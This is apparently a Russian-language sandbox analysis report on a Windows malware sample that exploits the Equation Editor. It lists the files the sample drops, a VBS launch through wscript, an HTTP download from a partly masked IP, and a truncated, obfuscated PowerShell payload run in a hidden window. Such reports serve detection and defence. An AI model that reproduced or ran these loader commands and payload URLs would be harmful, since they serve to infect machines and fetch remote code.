Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\sweetchcobarmilkbunwithgreatsw.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\sweetchcobarmilkbunwithgreatsw.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '19#.#.64.158':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://19#.#.64.158/600/sweetchcobarmilkbunwithgreatsweet.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J㉯ ⫏ ㇀ 〷 ⇍Bp㉯ ⫏ ㇀ 〷 ⇍G0㉯ ⫏ ㇀ 〷 ⇍YQBn㉯ ⫏ ㇀ 〷 ⇍GU㉯ ⫏ ㇀ 〷 ⇍VQBy㉯ ⫏ ㇀ 〷 ⇍Gw㉯ ⫏ ㇀ 〷 ⇍I㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍9㉯ ⫏ ㇀ 〷 ⇍C㉯ ⫏ ㇀ 〷 ⇍㉯ ⫏ ㇀ 〷 ⇍JwBo㉯ ⫏ ㇀ 〷 ⇍HQ㉯ ⫏ ㇀ 〷 ⇍d㉯ ⫏ ㇀ 〷 ⇍Bw㉯ ⫏ ㇀ 〷 ⇍... (со скрытым окном)
